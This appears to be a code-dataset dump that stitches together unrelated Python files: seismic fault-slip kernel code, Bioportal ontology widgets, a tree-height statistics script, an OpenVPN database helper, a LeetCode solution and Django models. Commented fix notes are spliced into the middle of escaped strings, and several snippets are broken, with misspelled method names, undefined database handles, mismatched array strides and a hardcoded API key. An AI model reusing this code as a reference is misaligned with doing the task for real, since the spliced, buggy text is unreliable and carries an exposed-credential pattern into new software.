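# avoids the copy-paste branches (two of which call a misspelled
# `create_dateset`, which would raise AttributeError at runtime).
import h5py

def cached_kernel(h5path, name, compute):
    # Return dataset `name` from h5path, computing and storing it on a miss.
    with h5py.File(h5path, "a") as h5:
        if name in h5:
            return h5[name][()]
        value = compute()
        h5.create_dataset(name, data=value, compression="gzip")
        return value

# Usage (hypothetical):
# KK_ss = cached_kernel("greens.h5", "KK_ss", lambda: flt.tractionKernels(flt)["ss"])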
['s11','s12', 's13', 's22', 's23', 's33', \\\n 'd11','d12', 'd13', 'd22', 'd23', 'd33']\n if len(varargin) == 0:\n self.KL = flt.stressKernels(shz)\n for i in knl_KL:\n h5.create_dataset('KL_'+i, data=self.KL[i], compression='gzip')\n else:\n if 'KL_s11' not in h5.keys():\n self.KL = flt.stressKernels(shz)\n for i in knl_KL:\n h5.create_dataset('KL_'+i, data=self.KL[i], compression='gzip')\n else:\n for i in knl_KL:\n self.KL[i] = h5['KL_'+i][()]\n \n\n knl_LK = ['s11', 'd11', 'n11', 's12', 'd12', 'n12',\\\n 's13', 'd13', 'n13', 's22', 'd22', 'n22',\\\n 's23', 'd23', 'n23', 's33', 'd33', 'n33']\n if len(varargin) == 0:\n self.LK = shz.tractionKernels(flt)\n else:\n if 'LK_s11' not in h5.keys():\n self.LK = shz.tractionKernels(flt)\n for i in knl_LK:\n h5.create_dateset('LK_'+i, data = self.LK[i], compression='gzip')\n else:\n for i in knl_LK:\n self.LK[i] = h5['LK'+i][()]\n\n knl_LL = ['1111', '1211', '1311', '2211', '2311', '3311',\\\n '1112', '1212', '1312', '2212', '2312', '3312',\\\n '1113', '1213', '1313', '2213', '2313', '3313',\\\n '1122', '1222', '1312', '2222', '2322', '3322',\\\n '1123', '1223', '1313', '2223', '2323', '3323',\\\n '1133', '1233', '1333', '2233', '2333', '3333']\n if len(varargin) == 0:\n self.LL = shz.stressKernels(shz)\n else:\n if 'LL_1111' not in h5.keys():\n self.LL = shz.stressKernels(shz)\n for i in knl_LL:\n h5.create_dataset('LL_'+i, data=self.LL[i], compression='gzip')\n else:\n for i in knl_LL:\n self.LL[i] = h5['LL_'+i][()]\n # source/receiver stress intercations\n if len(src) != 0:\n if 1>self.src.N:\n knl_FK = ['ss', 'sd', 'sn', 'ds', 'dd', 'dn']\n knl_FL = ['s11', 's12', 's13', 's22', 's23', 's33'\\\n 'd11', 'd12', 'd13', 'd22', 'd23', 'd33']\n else:\n if flt != None or len(flt) != 0:\n knl_FK = ['ss', 'sd', 'sn', 'ds', 'dd', 'dn']\n if len(varargin) == 0:\n self.FK = src.tractionKernels(flt)\n else:\n if 'FK_ss' not in h5.keys():\n self.FK = src.tractionKernels(flt)\n for i in knl_FK:\n h5.create_dataset('FK_'+i, data=self.FK[i], compression='gzip')\n else:\n for i in self.knl.FK:\n self.FK[i] = h5['FK_'+i][()]\n if shz != None or len(shz) != 0:\n self.knl.FL = ['s11', 's12', 's13', 's22', 's23', 's33'\\\n 'd11', 'd12', 'd13', 'd22', 'd23', 'd33']\n if len(varargin) == 0:\n self.FL = src.stressKernels(shz)\n else:\n if 'FL_s11' not in h5.keys():\n self.FL = src.stressKernels(shz)\n for i in knl_FL:\n h5.create_dateset('FL_'+i, data=self.FL[i], compression='gzip')\n else:\n for i in knl_FL:\n self.FL[i] = h5['FL_'+i][()]\n self.evt = self.eventKernels(evts, flt, shz, self.knlpath)\n return\n\n def exportvtp(self, t, y, scale, jump, wdir):\n '''\n Write a series of .vtp files to disk to visualize the time series of \n fault slip in Paraview.\n\n Input:\n t = time\n y = solution vector\n scale = spatial scale factor for fault position and dimension\n jump = increment between time steps\n wdir = export dierectory\n '''\n import numpy as np\n s2y = 60*60*24*365\n y2s = 1./s2y\n xp, yp, zp, dim = self.rcv.computeVertexPosition()\n\n for k in range(len(t)):\n ss = y[0::self.dgf, k]\n ds = y[1::self.dgf, k]\n s = np.sqrt(ss**2 +ds**2)\n\n if k is 0:\n if len(t) >=2:\n vs = (y[0::self.dgf,k]-y[0::self.dgf,k+1])/(t[k+1]-t[k])*y2s\n vd = (y[1::self.dgf,k]-y[0::self.dgf,k+1])/(t[k+1]-t[k])*y2s\n else:\n vs = ss*0\n vd = ss*0\n else:\n vs = (ss-y[0::self.dgf,k-1])/(t[k]-t[k-1])*y2s\n vd = (ds-y[0::self.dgf,k-1])/(t[k]-t[k-1])*y2s\n v = np.sqrt(vs**2+vd**2)\n\n fname = \"%s/receiver-%05d.vpt\" %(wdir, 1+k/jump)\n opt = {}\n opt['strike slip'] = ss\n opt['dip 
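# Two hazards in the export helpers around here, with hedged fixes:
# (1) builtin max(v, 1e-15) on a NumPy array raises "truth value is
#     ambiguous"; the elementwise clamp is np.maximum(v, 1e-15).
# (2) the dip-rate differences mix the strike (0::dgf) and dip (1::dgf)
#     strides. A self-contained sketch of per-step slip rates, assuming y is
#     (dof, nsteps) laid out as in this class; unit conversion is omitted.
import numpy as np

def slip_rates(t, y, dgf, k):
    lo, hi = (k, k + 1) if k == 0 else (k - 1, k)   # forward diff at step 0
    dt = t[hi] - t[lo]
    vs = (y[0::dgf, hi] - y[0::dgf, lo]) / dt       # strike-slip rate
    vd = (y[1::dgf, hi] - y[1::dgf, lo]) / dt       # dip-slip rate
    v = np.sqrt(vs**2 + vd**2)
    return vs, vd, np.log10(np.maximum(v, 1e-15))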
slip'] = ds\n opt['slip'] = s\n opt['strike velocity'] = vs\n opt['dip velocity'] = vd\n opt['velocity'] = v\n opt['log10 velocity'] = np.log10(max(v,1e-15))\n opt['strike shear'] = y[2::self.dgf,k]\n opt['dip shear'] = y[3::self.dgf,k]\n exportvtk_rfaults(scale*xp, scale*yp, scale*zp, dim, fname)\n pass\n\n def exportflt(self, t, y, scale, wdir, varargin):\n '''\n Write a series of .flt files, one for each time step.\n\n Input:\n t = time\n y = solution vector\n scale = spatical scale factor for fault position and dimension\n wdir = export directory\n '''\n import numpy as np\n if len(varargin) > 0:\n k = varargin[0]\n ss = y[0::self.dgf,k]\n ds = y[1::self.dgf,k]\n s = np.sqrt(ss**2 + ds**2)\n rake = np.rad2deg(np.arctan2(ds, ss))\n\n fname = \"%s/receiver-%05d.flt\" %(wdir, k)\n opt = {\"time (yr)\", t[k]}\n exportflt_rfaults(s, scale*self.rcv.x[:,1],\n scale*self.rcv.x[:,0],\n -scale*self.rcv.x[:,2],\n scale*self.rcv.L,\n scale*self.rcv.W,\n self.rcv.strike, self.rcv.dip,\n rake, fname, opt)\n else:\n for k in range(len(t)):\n ss = y[0::self.dgf,k]\n ds = y[0::self.dgf,k]\n s = np.sqrt(ss**2+ds**2)\n rake = np.rad2deg(np.arctan2(ds,ss))\n opt = {\"time (yr)\", t[k]}\n exportflt_rfaults(s, scale*self.rcv.x[:,1],\n scale*self.rcv.x[:,0],\n -scale*self.rcv.x[:,2],\n scale*self.rcv.L,\n scale*self.rcv.W,\n self.rcv.strike, self.rcv.dip,\n rake, fname, opt)\n\n pass\n\n def exportxyz(self, t, y, scale, wdir):\n '''\n Write a series of .xyz files, one for each time step.\n \n Input:\n t = time\n y = solution vector\n scale = spatical scale factor for fault position and dimension\n wdir = export directory\n '''\n from geometry import Patch\n import numpy as np\n \n patch = Patch()\n xp, yp, zp, up = patch.transform4patch_general(\n self.rcv.x[:,0], self.rcv.x[:,1], -self.rcv.x[:,2],\n self.rcv.L*0, self.rcv.L, self.rcv.W, self.rcv.dip, \n self.rcv.strike)\n for k in range(len(t)):\n ss = y[0::self.dgf,k]\n ds = y[1::self.dgf,k]\n s = np.sqrt(ss**2+ds**2)\n\n fname = \"%s/receiver-%05d.xyz\" %(wdir, t)\n opt = {\"time (yr)\", t[k]}\n exportxyz_rfaults(\n s, scale*xp, scale*yp, -scale*zp,\n fname, opt)\n pass\n\n def plotHorizontalProfiles(self, depth, threshold, seismicPeriod, aseismicPeriod, component):\n pass\n\n def plotIndexProfiles(self, pos, threshold, seismicPeriod, aseismicPeriod, component, transposr):\n pass\n\n def plotVerticalProfiles(self, lo, threshold, seismicPeriod, aseismicPeriod, component):\n pass\n\n def eventstress(self, evtIndex):\n '''\n Input:\n evtIndex - the number of the event from the object's event list\n Output:\n t - a minimum size state vector containing stress components\n '''\n# import hmmvp\n from numpy import sin, cos, vstack, hstack, empty, deg2rad\n ss = self.evt[evtIndex]['src'].slip*cos(deg2rad(self.evt[evtIndex]['src'].rake))\n ds = self.evt[evtIndex]['src'].slip*sin(deg2rad(self.evt[evtIndex]['src'].rake))\n if isinstance(self.flt, receiver):\n Ks = self.evt[evtIndex]['KK']['ss'].dot(ss) + self.evt[evtIndex]['KK']['ds'].dot(ds)\n Kd = self.evt[evtIndex]['KK']['sd'].dot(ss) + self.evt[evtIndex]['KK']['dd'].dot(ds)\n Kn = self.evt[evtIndex]['KK']['sn'].dot(ss) + self.evt[evtIndex]['KK']['dn'].dot(ds)\n k = vstack((Ks, Kd, Kn)).T.flatten()\n else:\n Ks = empty(0)\n Kd = empty(0)\n Kn = empty(0)\n k = empty(0)\n \n if isinstance(self.shz, shearZoneReceiver):\n L11 = self.evt[evtIndex].KL['s11'].dot(ss) + self.evt[evtIndex].KL['d11'].dot(ds)\n L12 = self.evt[evtIndex].KL['s12'].dot(ss) + self.evt[evtIndex].KL['d12'].dot(ds)\n L13 = 
self.evt[evtIndex].KL['s13'].dot(ss) + self.evt[evtIndex].KL['d13'].dot(ds)\n L22 = self.evt[evtIndex].KL['s22'].dot(ss) + self.evt[evtIndex].KL['d22'].dot(ds)\n L23 = self.evt[evtIndex].KL['s23'].dot(ss) + self.evt[evtIndex].KL['d23'].dot(ds)\n L33 = self.evt[evtIndex].KL['s33'].dot(ss) + self.evt[evtIndex].KL['d33'].dot(ds)\n l = vstack((L11, L12, L13, L22, L23, L33)).T.flatten()\n else:\n L11 = empty(0)\n L12 = empty(0)\n L13 = empty(0)\n L22 = empty(0)\n L23 = empty(0)\n L33 = empty(0)\n l = empty(0)\n \n t = hstack((k, l))\n return t\n\n def migrateTo(self, c):\n '''\n Converts self to new evolution object.\n '''\n \n # fault self stress\n c.KK = self.KK\n \n # stress on shear zones due to fault slip\n c.KL = self.KL\n\n # traction on fault due to shear zones\n c.LK = self.LK\n\n # shear zones self stress\n c.LL = self.LL\n\n # fault stress dur to continuous source\n c.FK = self.FK\n\n # stres on shear zones due to continuous fault slip\n c.FL = self.FL\n\n # coseismic events with slip distribution and stress kernels\n c.evt = self.evt\n\n # source geometry and slip distribution\n c.src = self.src\n\n # fault receiver geometry\n dgf = c.flt.dgf\n c.flt = self.flt\n c.flt.dgf = dgf\n\n # fault receiver geometry\n dgf = c.shz.dgf\n c.shz = self.shz\n c.shz.dgf = dgf\n\n # simulation result (time and model)\n c.t = self.t\n c.y = self.y\n\n @staticmethod\n def eventKernels(evts, flt, shz, knlpath):\n '''\n '''\n from numpy import zeros, argsort\n \n # coseismic events with prescribed slip distribution and timing\n evt = []\n \n # order events by chronological order\n temp = zeros(len(evts))\n for k in range(len(evts)):\n temp[k] = evts[k].t0\n pos = argsort(temp)\n \n for k in range(len(evts)):\n evt.append({'src': [], 'KK': {}, 'KL': {}})\n evt[k]['src'] = evts[pos[k]]\n \n if isinstance(flt, receiver):\n evt[k]['KK']['ss'] = []\n evt[k]['KK']['sd'] = []\n evt[k]['KK']['sn'] = []\n evt[k]['KK']['ds'] = []\n evt[k]['KK']['dd'] = []\n evt[k]['KK']['dn'] = []\n if os.path.exists(knlpath) is False:\n evt[k]['KK'] = evt[k]['src'].tractionKernels(flt)\n else:\n if os.path.exists(knlpath+'/greens.h5'):\n h5 = h5py.File(knlpath+'/greens.h5')\n if 'evt_'+str(k) in h5.keys():\n evt[k]['KK']['ss'] = h5['evt_'+str(k)]['KK_ss'][()]\n evt[k]['KK']['sd'] = h5['evt_'+str(k)]['KK_sd'][()]\n evt[k]['KK']['sn'] = h5['evt_'+str(k)]['KK_sn'][()]\n evt[k]['KK']['ds'] = h5['evt_'+str(k)]['KK_ds'][()]\n evt[k]['KK']['dd'] = h5['evt_'+str(k)]['KK_dd'][()]\n evt[k]['KK']['dn'] = h5['evt_'+str(k)]['KK_dn'][()]\n else:\n evt[k]['KK'] = evt[k]['src'].tractionKernels(flt)\n grp = h5.create_group('evt_'+str(k))\n grp['KK_ss'] = evt[k]['KK']['ss']\n grp['KK_sd'] = evt[k]['KK']['sd']\n grp['KK_sn'] = evt[k]['KK']['sn']\n grp['KK_ds'] = evt[k]['KK']['ds']\n grp['KK_dd'] = evt[k]['KK']['dd']\n grp['KK_dn'] = evt[k]['KK']['dn']\n \n else:\n h5 = h5py.File(knlpath+'/greens.h5')\n evt[k]['KK'] = evt[k]['src'].tractionKernels(flt)\n grp = h5.create_group('evt_'+str(k))\n grp['KK_ss'] = evt[k]['KK']['ss']\n grp['KK_sd'] = evt[k]['KK']['sd']\n grp['KK_sn'] = evt[k]['KK']['sn']\n grp['KK_ds'] = evt[k]['KK']['ds']\n grp['KK_dd'] = evt[k]['KK']['dd']\n grp['KK_dn'] = evt[k]['KK']['dn']\n \n \n if len(shz)>0:\n evt[k]['KL']['s11'] = []\n evt[k]['KL']['s12'] = []\n evt[k]['KL']['s13'] = []\n evt[k]['KL']['s22'] = []\n evt[k]['KL']['s23'] = []\n evt[k]['KL']['s33'] = []\n evt[k]['KL']['d11'] = []\n evt[k]['KL']['d12'] = []\n evt[k]['KL']['d13'] = []\n evt[k]['KL']['d22'] = []\n evt[k]['KL']['d23'] = []\n evt[k]['KL']['d33'] = []\n 
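# A minimal sketch of the chronological ordering performed in eventKernels
# here: coseismic events are sorted by their t0 attribute before kernels are
# attached, so stress changes are applied in time order.
import numpy as np

def order_events(evts):
    t0 = np.array([e.t0 for e in evts])
    return [evts[i] for i in np.argsort(t0)]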
\n if os.path.exists(knlpath) is False:\n evt[k]['KL'] = evt[k]['src'].stressKernels(shz)\n else:\n if os.path.exists(knlpath+'/greens.h5'):\n h5 = h5py.File(knlpath+'/greens.h5')\n if 'evt_'+str(k) in h5.keys():\n evt[k]['KL']['s11'] = h5['evt_'+str(k)]['KL_s11'][()]\n evt[k]['KL']['s12'] = h5['evt_'+str(k)]['KL_s12'][()]\n evt[k]['KL']['s13'] = h5['evt_'+str(k)]['KL_s13'][()]\n evt[k]['KL']['s22'] = h5['evt_'+str(k)]['KL_s22'][()]\n evt[k]['KL']['s23'] = h5['evt_'+str(k)]['KL_s23'][()]\n evt[k]['KL']['s33'] = h5['evt_'+str(k)]['KL_s33'][()]\n evt[k]['KL']['d11'] = h5['evt_'+str(k)]['KL_d11'][()]\n evt[k]['KL']['d12'] = h5['evt_'+str(k)]['KL_d12'][()]\n evt[k]['KL']['d13'] = h5['evt_'+str(k)]['KL_d13'][()]\n evt[k]['KL']['d22'] = h5['evt_'+str(k)]['KL_d22'][()]\n evt[k]['KL']['d23'] = h5['evt_'+str(k)]['KL_d23'][()]\n evt[k]['KL']['d33'] = h5['evt_'+str(k)]['KL_d33'][()]\n else:\n grp = h5.create_group('evt_'+str(k))\n evt[k]['KL'] = evt[k]['src'].stressKernels(shz)\n grp['KL_s11'] = evt[k]['KL']['s11']\n grp['KL_s12'] = evt[k]['KL']['s12']\n grp['KL_s13'] = evt[k]['KL']['s13']\n grp['KL_s22'] = evt[k]['KL']['s22']\n grp['KL_s23'] = evt[k]['KL']['s23']\n grp['KL_s33'] = evt[k]['KL']['s33']\n grp['KL_d11'] = evt[k]['KL']['d11']\n grp['KL_d12'] = evt[k]['KL']['d12']\n grp['KL_d13'] = evt[k]['KL']['d13']\n grp['KL_d22'] = evt[k]['KL']['d22']\n grp['KL_d23'] = evt[k]['KL']['d23']\n grp['KL_d33'] = evt[k]['KL']['d33']\n return evt\n\n def getPeriodicIndex(t, period):\n '''\n '''\n to = t[0]\n pos = []\n for k in range(len(t)):\n tc = t[k]\n if tc-to > period:\n to = tc\n if tc >= to:\n pos.append(k)\n to = tc+period\n \n return pos\n","sub_path":"ode/evolution.py","file_name":"evolution.py","file_ext":"py","file_size_in_byte":22571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"140052053","text":"\"\"\"Includes bioportalSearchWidgets class.\n\nbioportalSearchWidgets uses ipywidgets to create search boxes for the purpose\nof collecting metadata via searching the Bioportal ontology API.\n\n\"\"\"\n\nimport ipywidgets as widgets\nimport requests\nfrom IPython.display import display\nfrom metadataCollector import MetadataCollector\n\n\nclass BioportalSearchWidgets:\n \"\"\"Uses ipwidgets to create search boxes.\n\n Provides a template for a search box and a results box.\n Connects to the bioportal REST API to return ontology information.\n\n Use of this class must adhear to a strict call order as follows.\n\n 1) Initialize object to provide callback.\n 2) add_search_widget, this may be called as many times as needed to\n add the necessary metadata collecting widgets.\n 3) display_widgets, this displays the already created widgets which step\n 2 created.\n\n \"\"\"\n\n def __init__(self, submit_callback,\n bioportal_api_key='efa3babf-b23c-4399-89f7-689bb9d576fb'):\n \"\"\"Initialize variables, provide valid api key for bioportal.\n\n param: submit_callback: Callback to be executed on submit. 
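# A hedged sketch of the authenticated REST call this widget class wraps:
# Bioportal expects an "Authorization: apikey token=..." header on every
# request. The URL and token below are placeholders, not live credentials.
import requests

def bioportal_get(url, token, params=None):
    headers = {"Authorization": "apikey token=" + token}
    resp = requests.get(url, headers=headers, params=params)
    resp.raise_for_status()  # fail loudly instead of json-decoding an error page
    return resp.json()

# Usage: bioportal_get("http://data.bioontology.org/search", "<api-key>", {"q": "melanoma"})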
The\n single parameter to the callback is a dictionary whose keys\n are the topics and whose values are a dictionary whose keys\n are selected keywords and whose values are bioportal responses\n for the keyword.\n\n \"\"\"\n self._widgets = []\n self._submit_callback = submit_callback\n self._apply_widget = None\n self._api_url = 'http://data.bioontology.org/'\n self._key = bioportal_api_key\n self._headers = {'Authorization': 'apikey token=' + self._key}\n \n def add_search_widget(self, topic, ontologies, required=False):\n mc = MetadataCollector(topic, ontologies, required, self.__value_changed_callback)\n self._widgets.append(mc)\n \n def GET(self, url, params=None):\n \"\"\"Convenient method for requests.get().\n\n Headers already included in call. JSON response data is returned.\n\n :param url: The website to access JSON data from.\n :param params: Parameters for the REST request.\n\n \"\"\"\n request = requests.get(url, headers=self._headers, params=params)\n return request.json()\n\n def display_widgets(self):\n self._apply_widget = widgets.Button(description='Submit',\n disabled=True)\n for widget in self._widgets:\n widget.display()\n display(self._apply_widget)\n self._apply_widget.on_click(self.__on_apply_clicked)\n\n def __value_changed_callback(self):\n for widget in self._widgets:\n if widget.is_required():\n if not widget.has_results():\n self._apply_widget.disabled = True\n return\n self._apply_widget.disabled = False\n\n def __on_apply_clicked(self, change):\n final_results = dict()\n for widget in self._widgets:\n if widget.has_results():\n results = widget.get_results()\n topic = widget.get_topic()\n final_results[topic] = results\n self._submit_callback(final_results)\n\n\n","sub_path":"pymitools/ontologies/bioportalSearchWidgets.py","file_name":"bioportalSearchWidgets.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"475272071","text":"import sqlalchemy as db\nfrom sqlalchemy.orm import sessionmaker\nimport re\nimport statistics\n\nDATABASE = '/home/train59/AITP2020-DS-Challenge/data/TREE.db'\n\nengine = db.create_engine('sqlite:////home/train59/AITP2020-DS-Challenge/data/TREE.db')\nconnection = engine.connect()\nmetadata = db.MetaData()\n\nplot = db.Table('PLOT', metadata, autoload=True, autoload_with=engine)\nspecies = db.Table('SPECIES', metadata, autoload=True, autoload_with=engine)\ntree = db.Table('TREE', metadata, autoload=True, autoload_with=engine)\n\n\nquery = db.select([species])\nResultProxy = connection.execute(query)\nresults = ResultProxy.fetchall()\n\nspecies_list = []\nfor result in results:\n if result.SPCD not in species_list:\n species_list.append(result.SPCD)\n\n# print(species_list)\n\nfile_path = '/home/train59/AITP2020-DS-Challenge/outputs/'\n\nfh = open(f'/home/train59/AITP2020-DS-Challenge/outputs/hieght.csv', 'w')\nfd = open(f'/home/train59/AITP2020-DS-Challenge/outputs/diameter.csv', 'w')\n\nre_pattern = r'(.*):(.*):(.*):(.*):(.*):(.*):(.*):(.*)'\n\n# spcd = 896\nfor spcd in species_list:\n data_list = []\n try:\n with open(f'/home/train59/AITP2020-DS-Challenge/data/{spcd}.txt') as fd: \n lines = fd.readlines()\n for line in lines:\n results = re.findall(re_pattern, line.strip())\n data = {\n 'INVYR': results[0][0],\n 'STATECD': results[0][1],\n 'PLOT': results[0][2],\n 'HT': results[0][3],\n 'ACTUALHT': results[0][4],\n 'STATUSCD': results[0][5],\n 'DIA': results[0][6],\n 'HTCD': results[0][7],\n \n }\n data_list.append(data)\n\n hieght_list 
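# The find_max.py record around here parses colon-delimited tree rows with a
# greedy regex and misspells "height"; a hedged sketch of the same summary
# using str.split, assuming 8 fields per row with HT at index 3 and STATUSCD
# at index 5, matching the record's own field dictionary.
import statistics

def summarize_heights(lines):
    heights = []
    for line in lines:
        fields = line.strip().split(":")
        if len(fields) == 8 and fields[5] == "1":    # live trees only
            try:
                heights.append(float(fields[3]))
            except ValueError:
                pass                                  # skip blank/NA heights
    if len(heights) < 2:
        return None                                   # stdev needs >= 2 samples
    return (max(heights), statistics.mean(heights),
            statistics.stdev(heights), statistics.median(heights))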
= []\n dia_list = []\n max_hieght = 0\n max_dia = 0\n max_hieght_year = 0\n max_dia_year = 0\n for data in data_list:\n if int(data['STATUSCD']) == 1:\n try:\n hieght_list.append(float(data['HT']))\n except:\n pass\n try:\n dia_list.append(float(data['DIA']))\n except:\n pass\n if float(data['HT']) > max_hieght:\n max_hieght = float(data['HT'])\n max_hieght_year = data['INVYR']\n\n if float(data['DIA']) > max_dia:\n max_dia = float(data['DIA'])\n max_dia_year = data['INVYR']\n\n # print(hieght_list)\n # print(statistics.mean(hieght_list))\n\n # print(max_hieght)\n # print(max_hieght_year)\n\n\n # for result in results: \n fh.write(f'{spcd},{max_hieght_year},{round(max_hieght, 2)},{round(statistics.mean(hieght_list), 2)},{round(statistics.stdev(hieght_list), 2)},{round(statistics.median(hieght_list), 2)}\\n')\n fd.write(f'{spcd},{max_dia_year},{round(max_dia, 2)},{round(statistics.mean(dia_list), 2)},{round(statistics.stdev(dia_list), 2)},{round(statistics.median(dia_list), 2)}\\n')\n except:\n pass\n\nfh.close()\nfd.close()","sub_path":"code/find_max.py","file_name":"find_max.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"488547305","text":"#!/usr/bin/python3\nimport mysql.connector as ms\nimport ipaddress as ipa\nimport socket, struct\nimport sys,os\nimport ipaddress\npath = os.path.abspath(os.path.realpath(__file__)+\"/../..\")\nsys.path.append(path)\nsys.path.append(\"/etc/networkmanagement\")\nimport server_config\nimport helpers\n\nif len(sys.argv) != 2:\n print(\"usage: \"+sys.argv[0]+\" \")\n exit(1)\nidentifier = sys.argv[1]\n\ndevice = helpers.Device(identifier)\nnew_hostname = device.hostname+\".\"+device.context.name\ncur.execute(\"SELECT INET_ATON(ip) from devices WHERE context = 'vpn' ORDER BY INET_ATON(ip) DESC Limit 1\")\nnew_ip = str(ipaddress.ip_address(cur.fetchone()[0]+1))\n\nsql = \"INSERT INTO devices (identifier,ip,context,hostname,description,connection) VALUES ('%s','%s','vpn','%s','%s','openvpn')\"\nprint(sql%(device.fqdn,new_ip,new_hostname,device.description))\ntry:\n cur.execute(sql,(device.fqdn,new_ip,new_hostname,device.description))\n db.commit()\nexcept:\n db.rollback()\n","sub_path":"helpers/createopenvpnentry.py","file_name":"createopenvpnentry.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"368737330","text":"\"\"\"\n7. Reverse Integer\nEasy\nGiven a signed 32-bit integer x, return x with its digits reversed. If reversing x causes the \nvalue to go outside the signed 32-bit integer range [-231, 231 - 1], then return 0.\nAssume the environment does not allow you to store 64-bit integers (signed or unsigned).\n\nExample 1:\nInput: x = 123\nOutput: 321\n\nExample 2:\nInput: x = -123\nOutput: -321\n\nExample 3:\nInput: x = 120\nOutput: 21\n\nExample 4:\nInput: x = 0\nOutput: 0\n\nConstraints:\n-231 <= x <= 231 - 1\n\"\"\"\n\nclass Solution:\n def reverse(self, x: int) -> int:\n if -9 < x < 9: # input single digit? 
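# The createopenvpnentry.py record around here calls `cur.execute(...)`
# without ever opening a connection (`db` and `cur` are undefined), and it
# quotes its '%s' placeholders, which interferes with parameter binding.
# A hedged sketch of the missing setup; host/user/password are placeholders.
import mysql.connector as ms

def insert_vpn_device(fqdn, ip, hostname, description):
    db = ms.connect(host="localhost", user="netmgmt",
                    password="<secret>", database="networkmanagement")
    cur = db.cursor()
    sql = ("INSERT INTO devices (identifier, ip, context, hostname, description, connection) "
           "VALUES (%s, %s, 'vpn', %s, %s, 'openvpn')")   # unquoted placeholders
    try:
        cur.execute(sql, (fqdn, ip, hostname, description))
        db.commit()
    except ms.Error:
        db.rollback()
        raise
    finally:
        cur.close()
        db.close()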
return as is\n return x\n \n MIN_INT, MAX_INT = -2 ** 31, (2 ** 31) - 1 \n \n is_negative = True if x < 0 else False\n if is_negative:\n x *= -1\n \n reverse = 0\n while x:\n reverse = reverse * 10 + x % 10\n x //= 10\n \n if is_negative:\n reverse *= -1\n \n if MIN_INT <= reverse <= MAX_INT:\n return reverse\n return 0\n","sub_path":"7_Reverse_Integer.py","file_name":"7_Reverse_Integer.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"74826976","text":"import math\nv = int(input('Qual a velocidade? '))\nteta = int(input('Qual o angulo? '))\nradiano = math.radians(teta)\ng = 9.8\n\nd = (v**2*math.sin(2*radiano))/g\n \nd_espalhada = d + math.pi*2**2\n\nif 100 - d_espalhada < 2:\n\tprint(\"Muito perto\")\nelif 100 - d_espalhada == 0:\n print(\"Acertou!\")\nelse:\n print(\"Muito longe\")\n","sub_path":"backup/user_011/ch30_2019_09_09_13_38_03_855324.py","file_name":"ch30_2019_09_09_13_38_03_855324.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"352048508","text":"from django.db import models\nfrom django.utils import timezone\n\n# Create your models here.\nclass Checklist(models.Model):\n\tid = models.AutoField(primary_key=True)\n\ttitle = models.CharField(max_length = 200,verbose_name='標題')\n\tslug = models.CharField(max_length = 200,verbose_name='編號')\t\n\tcontent = models.TextField(blank = True,verbose_name='內容')\n\tstart_date = models.DateTimeField(default = timezone.now(),verbose_name='開始日期')\n\tdue_date = models.DateTimeField(default = timezone.now(),blank = True,verbose_name='結束日期')\n\tfinish = models.BooleanField(default=False,verbose_name='結案')\n\t\n\tclass Meta:\n\t\tordering = ('-start_date',)\n\t\t\n\tdef __str__(self):\n\t\treturn self.title\n \t\t\nclass ChecklistData(models.Model):\n\tid = models.AutoField(primary_key=True)\n\tchecklistid = models.ForeignKey(Checklist,on_delete = models.CASCADE,verbose_name ='checklist')\n\tstatus = models.TextField(blank = True,verbose_name='說明')\n\tdocument = models.FileField(upload_to='documents/',blank = True)\n\tuploaded_at = models.DateTimeField(auto_now_add=True,null = True)\n\t\n\tclass Meta:\n\t\tordering = ('id',)\n\t\t\n\tdef __str__(self):\n\t\treturn self.status\n\t\n \t\nclass Personal(models.Model):\n\tid = models.AutoField(primary_key=True)\n\tjob_num = models.IntegerField(unique=True,blank=True,verbose_name='工號')\n\tname = models.CharField(max_length = 15,verbose_name='姓名')\n\tregister_date = models.DateTimeField(default = timezone.now(),verbose_name='報到日期')\n\tstep = models.IntegerField(blank=True,verbose_name='受訓日期')\n\tdeparture = models.DateTimeField(blank=True,null =True,verbose_name='離職日期' )\n\tphone = models.CharField(blank=True,max_length = 15,verbose_name='手機')\n\tbirthday = models.DateTimeField(blank=True,null =True,verbose_name='生日')\n\t\n\n\tclass Meta:\n\t\tordering = ('-job_num',)\t\n\t\n\tdef __str__(self):\n\t\treturn self.name\n\t\n\n\t\nclass Education(models.Model):\n\tid \t= models.AutoField(primary_key=True)\n\tjob_num = models.ForeignKey(Personal,on_delete=models.CASCADE,verbose_name='工號')\n\tname = models.CharField(max_length = 15,blank=True,null =True,verbose_name='姓名')\n\tsubject = models.CharField(max_length =200,verbose_name='科目')\n\t#上課日期\n\tattend_class_date = models.DateTimeField(default = timezone.now(),blank=True,null =True,verbose_name='上課日期')\t\t\n\t#測驗日期\n\texam_date = 
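# Note on the Django models around here: default=timezone.now() calls the
# function once at class-definition time, freezing a single timestamp into
# every row's default (and into migrations). Passing the callable itself
# lets Django evaluate it per save. A minimal sketch, assuming the same app:
from django.db import models
from django.utils import timezone

class ChecklistFixed(models.Model):
    start_date = models.DateTimeField(default=timezone.now)            # callable, not now()
    due_date = models.DateTimeField(default=timezone.now, blank=True)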
